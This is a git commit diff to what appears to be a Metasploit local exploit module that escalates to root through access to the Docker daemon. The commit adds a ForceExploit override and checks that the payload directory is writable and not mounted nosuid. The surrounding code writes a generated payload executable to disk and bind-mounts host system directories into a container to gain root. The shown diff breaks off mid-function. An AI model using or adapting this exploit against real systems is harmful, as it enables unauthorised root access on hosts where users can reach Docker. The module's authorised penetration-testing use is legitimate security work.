Add check for writable and nosuid WritableDir

GSoC/Meterpreter_Web_Console
Brendan Coles 2019-01-11 22:41:14 +00:00
parent d18c6bd158
commit 20fd6b6134
1 changed files with 29 additions and 2 deletions

View File

@ -29,12 +29,18 @@ class MetasploitModule < Msf::Exploit::Local
}
))
register_advanced_options([
OptBool.new('ForceExploit', [false, 'Override check result', false]),
OptString.new("WritableDir", [true, "A directory where we can write files", "/tmp"])
])
end
def base_dir
datastore['WritableDir'].to_s
end
def check
if cmd_exec('docker ps && echo true') =~ /true$/
print_good("Docker daemon is accessible.")
Exploit::CheckCode::Vulnerable
else
print_error("Failed to access Docker daemon.")
@ -43,8 +49,29 @@ class MetasploitModule < Msf::Exploit::Local
end
def exploit
unless check == CheckCode::Vulnerable
unless datastore['ForceExploit']
fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
end
print_warning 'Target does not appear to be vulnerable'
end
if is_root?
unless datastore['ForceExploit']
fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
end
end
unless writable? base_dir
fail_with Failure::BadConfig, "#{base_dir} is not writable"
end
if nosuid? base_dir
fail_with Failure::BadConfig, "#{base_dir} is mounted nosuid"
end
pl = generate_payload_exe
exe_path = "#{datastore['WritableDir']}/#{rand_text_alpha(6 + rand(5))}"
exe_path = "#{base_dir}/#{rand_text_alpha(6..11)}"
print_status("Writing payload executable to '#{exe_path}'")
write_file(exe_path, pl)
@ -59,7 +86,7 @@ class MetasploitModule < Msf::Exploit::Local
end
def shell_script(exploit_path)
deps = %w(/bin /lib /lib64 /etc /usr /opt) + [datastore['WritableDir']]
deps = %w(/bin /lib /lib64 /etc /usr /opt) + [base_dir]
dep_options = deps.uniq.map { |dep| "-v #{dep}:#{dep}" }.join(" ")
%Q{